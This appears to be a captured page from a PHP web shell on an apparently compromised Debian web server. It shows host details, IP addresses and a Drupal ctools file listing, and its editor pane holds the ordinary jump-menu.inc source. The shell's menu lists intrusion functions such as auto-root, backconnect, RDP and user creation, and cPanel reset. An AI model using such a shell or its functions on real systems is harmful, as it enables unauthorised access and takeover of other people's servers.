Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 3.138.61.88
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
baltic /
web /
modules /
ctools /
includes /
[ HOME SHELL ]
Name
Size
Permission
Action
action-links.theme.inc
697
B
-rw-r--r--
ajax.inc
4.67
KB
-rw-r--r--
cache.inc
5.79
KB
-rw-r--r--
cache.plugin-type.inc
236
B
-rw-r--r--
cleanstring.inc
7.66
KB
-rw-r--r--
collapsible.theme.inc
2.46
KB
-rw-r--r--
content.inc
25.63
KB
-rw-r--r--
content.menu.inc
6.67
KB
-rw-r--r--
content.plugin-type.inc
381
B
-rw-r--r--
content.theme.inc
458
B
-rw-r--r--
context-access-admin.inc
15.17
KB
-rw-r--r--
context-admin.inc
27.37
KB
-rw-r--r--
context-task-handler.inc
17.42
KB
-rw-r--r--
context.inc
47.33
KB
-rw-r--r--
context.menu.inc
1.23
KB
-rw-r--r--
context.plugin-type.inc
545
B
-rw-r--r--
context.theme.inc
12.42
KB
-rw-r--r--
css-cache.inc
971
B
-rw-r--r--
css.inc
17.43
KB
-rw-r--r--
dependent.inc
6.16
KB
-rw-r--r--
dropbutton.theme.inc
5.05
KB
-rw-r--r--
dropdown.theme.inc
3.1
KB
-rw-r--r--
entity-access.inc
4.61
KB
-rw-r--r--
export-ui.inc
16.62
KB
-rw-r--r--
export-ui.menu.inc
710
B
-rw-r--r--
export-ui.plugin-type.inc
536
B
-rw-r--r--
export.inc
39.03
KB
-rw-r--r--
fields.inc
12.42
KB
-rw-r--r--
jump-menu.inc
4.6
KB
-rw-r--r--
language.inc
1.18
KB
-rw-r--r--
math-expr.inc
17.69
KB
-rw-r--r--
menu.inc
3.28
KB
-rw-r--r--
modal.inc
7.77
KB
-rw-r--r--
object-cache.cron.inc
345
B
-rw-r--r--
object-cache.inc
6.39
KB
-rw-r--r--
page-wizard.inc
5.12
KB
-rw-r--r--
page-wizard.menu.inc
756
B
-rw-r--r--
plugins-admin.inc
7.38
KB
-rw-r--r--
plugins.inc
31.89
KB
-rw-r--r--
registry.inc
3
KB
-rw-r--r--
stylizer.inc
48.24
KB
-rw-r--r--
stylizer.theme.inc
647
B
-rw-r--r--
utility.inc
1.05
KB
-rw-r--r--
uuid.inc
1.97
KB
-rw-r--r--
views.inc
879
B
-rw-r--r--
wizard.inc
17.74
KB
-rw-r--r--
wizard.theme.inc
539
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : jump-menu.inc
<?php /** * @file * Provides a simple "jump menu". * * A jump menu is a select box and an optional 'go' button which can be removed * if javascript is in use. Each item is keyed to the href that the button * should go to. With javascript, the page is immediately redirected. Without * javascript, the form is submitted and a drupal_goto() is given. * */ /** * Generate a jump menu form. * * This can either be used with drupal_get_form() or directly added to a * form. The button provides its own submit handler so by default, other * submit handlers will not be called. * * One note: Do not use #tree = TRUE or it will be unable to find the * proper value. * * @code * ctools_include('jump-menu'); * $output = drupal_get_form('ctools_jump_menu', $targets, $options); * @endcode * * @param $select * An array suitable for use as the #options. The keys will be the direct * URLs that will be jumped to, so you absolutely must encode these using * url() in order for them to work reliably. * * @param $options * $options may be an array with the following options: * - 'title': The text to display for the #title attribute. * - 'description': The text to display for the #description attribute. * - 'default_value': The text to display for the #default_value attribute. * - 'hide': If TRUE the go button will be set to hide via javascript and * will submit on change. * - 'button': The text to display on the button. * - 'image': If set, an image button will be used instead, and the image * set to this. * - 'inline': If set to TRUE (default) the display will be forced inline. */ function ctools_jump_menu($form, &$form_state, $select, $options = array()) { $options += array( 'button' => t('Go'), 'choose' => t('- Choose -'), 'inline' => TRUE, 'hide' => TRUE, ); $form['#attached']['js'][] = ctools_attach_js('jump-menu'); if (!empty($options['choose'])) { $select = array('' => $options['choose']) + $select; } $form['jump'] = array( '#type' => 'select', '#options' => $select, '#attributes' => array( 'class' => array('ctools-jump-menu-select'), ), ); if (!empty($options['title'])) { $form['jump']['#title'] = $options['title']; } if (!empty($options['description'])) { $form['jump']['#description'] = $options['description']; } if (!empty($options['default_value'])) { $form['jump']['#default_value'] = $options['default_value']; } if (isset($options['image'])) { $form['go'] = array( '#type' => 'image_button', '#src' => $options['image'], '#submit' => array('ctools_jump_menu_submit'), '#attributes' => array( 'class' => array('ctools-jump-menu-button'), ), ); } else { $form['go'] = array( '#type' => 'submit', '#value' => $options['button'], '#submit' => array('ctools_jump_menu_submit'), '#attributes' => array( 'class' => array('ctools-jump-menu-button'), ), ); } if ($options['inline']) { $form['jump']['#prefix'] = '<div class="container-inline">'; $form['go']['#suffix'] = '</div>'; } if ($options['hide']) { $form['jump']['#attributes']['class'][] = 'ctools-jump-menu-change'; $form['go']['#attributes']['class'][] = 'ctools-jump-menu-hide'; } return $form; } /** * Submit handler for the jump menu. * * This is normally only invoked upon submit without javascript enabled. */ function ctools_jump_menu_submit($form, &$form_state) { if ($form_state['values']['jump'] === '') { // We have nothing to do when the user has not selected any value. return; } // If the path we are redirecting to contains the string :: then treat the // the string after the double colon as the path to redirect to. // This allows duplicate paths to be used in jump menus for multiple options. $redirect_array = explode("::", $form_state['values']['jump']); if(isset($redirect_array[1]) && !empty($redirect_array[1])){ $redirect = $redirect_array[1]; } else { $redirect = $form_state['values']['jump']; } // If the path we are redirecting to starts with the base path (for example, // "/somepath/node/1"), we need to strip the base path off before passing it // to $form_state['redirect']. $base_path = base_path(); if (strpos($redirect, $base_path) === 0) { $redirect = substr($redirect, strlen($base_path)); } // Parse the URL so that query strings and fragments are preserved in the // redirect. $redirect = drupal_parse_url($redirect); $redirect['path'] = urldecode($redirect['path']); $form_state['redirect'] = array($redirect['path'], $redirect); }
Close